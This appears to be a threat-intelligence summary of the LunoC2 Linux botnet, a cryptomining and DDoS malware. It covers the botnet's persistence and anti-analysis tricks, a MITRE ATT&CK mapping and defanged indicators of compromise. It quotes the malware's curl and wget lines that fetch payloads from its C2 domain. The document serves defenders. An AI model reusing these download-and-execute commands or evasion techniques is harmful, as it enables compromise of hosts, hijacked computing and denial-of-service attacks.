Cyble CRIL identified the Luno Linux botnet (LunoC2), a modular, actively evolving framework that combines crypto-mining (xmrig) and dozens of tunable DDoS attack methods with persistence, self-update, and strong anti-analysis features. Key infrastructure and artifacts include domains main.botnet[.]world, botnet[.]world, fallback IP 111[.]0.0.2, and a hardcoded Monero wallet 4B9gxLDjJP2ZNHm8R6k3hUTT9ozmArqUggecuyDntnWKYS9h3HLJAzs8TV2YP8P7VkMshJxtPnJJ5iZRQmncKWyVAwadHH2. #LunoC2 #main.botnet.world
Keypoints
- LunoC2 is a modular Linux botnet combining cryptomining (xmrig) and DDoS-as-a-service capabilities with active development and frequent module updates.
- The malware implements watchdog-based respawning, signal resistance, and process masquerading (e.g., renaming to bash or kworker) to ensure persistence and evade termination.
- It replaces system binaries (e.g., /bin/ash, /usr/bin/*) and uses polymorphic mkstemp-based self-update to maintain unique filenames and remove traces.
- Network defenses include scanning /proc/net/* to protect its socket and terminating unauthorized processes while maintaining a large whitelist of allowed processes and IPs (including Cloudflare and Google IPs).
- Anti-analysis techniques detect debuggers/tracers, common analysis tools, anomalous NICs, and timing delays, and will attempt self-deletion if analysis is suspected.
- DDoS modules provide dozens of attack types (layer 3/4 floods, HTTP/Layer7 floods, game-specific attacks for Roblox/Minecraft/Valorant, raknet-based floods) with tunable parameters for target, method, duration, and threads.
- Key IOCs: multiple SHA256 hashes for botnet agents and updates, C2 domains main.botnet[.]world / botnet[.]world / backup1.botnet[.]world, fallback IP 111[.]0.0.2, and miner pool pool.supportxmr[.]com with a hardcoded Monero wallet.
MITRE Techniques
- [T1059.004] Command and Scripting Interpreter β Uses utilities like wget/curl to download & execute binaries from the C2 (βcurl -sLo /bin/ash https://main[.]botnet[.]world/xmrigβ)
- [T1554] Compromise Host Software Binary β Ensures malware persistence by replacing software binaries (forms an HTTP GET to download βssβ and replaces system binaries in /usr/bin/)
- [T1036.004] Masquerading β Renames processes to mimic legitimate system processes and modifies /proc//comm and /proc//status to disguise itself as βbashβ
- [T1497.003] Virtualization/Sandbox Evasion β Implements anti-analysis techniques to evade detection (debugger/tracer checks, tool detection, NIC interface checks, timing checks) and self-deletes on anomalies
- [T1071] Application Layer Protocol β Uses HTTP protocol for C2 communication (command handler receives commands from resolved botnet[.]world)
- [T1105] Ingress Tool Transfer β Downloads additional tools such as the βssβ binary and xmrig miner from main.botnet[.]world (βwget -qO /tmp/.sh_updXXXXXX β)
- [T1496.001] Resource Hijacking β Uses infected systems to mine cryptocurrency via xmrig (launches βashβ with cpu-max-threads-hint and connects to pool.supportxmr[.]com:3333)
- [T1498] Network Denial of Service β Conducts Denial-of-Service attacks to disrupt networks using dozens of DDoS methods (udp-flood, syn-flood, game-specific modules like game-roblox and mc-fakejoin)
Indicators of Compromise
- [Domain] C2 and hosting β main.botnet[.]world, botnet[.]world (hosts xmrig and C2 functionality)
- [IP] C2/fallback IPs β 111[.]0.0.2 (DNS fallback), 162[.]247.155[.]210 (observed C2 IP)
- [Wallet ID] Mining wallet β Monero wallet 4B9gxLDjJP2ZNHm8R6k3hUTT9ozmArqUggecuyDntnWKYS9h3HLJAzs8TV2YP8P7VkMshJxtPnJJ5iZRQmncKWyVAwadHH2 (hardcoded miner wallet)
- [Domain] Miner pool β pool.supportxmr[.]com (configured mining pool used by xmrig)
- [URL] Update endpoints β hxxp://backup1[.]botnet[.]world/x86_64 (used for .update downloads)
- [File/Path] Replaced binaries and downloaded filenames β /bin/ash (xmrig saved as ash), /tmp/.sh_updXXXXXX (temporary polymorphic update filename)
- [Hashes] Malware binaries β example SHA256: 02228a0bb896ba1c7d9ba55e30e2283ed0813828710a59b44ee5cd9ca15fde8d (botnet agent), and many other listed hashes (and 40+ more SHA256 values)
Read more: https://cyble.com/blog/lunobotnet-a-self-healing-linux-botnet/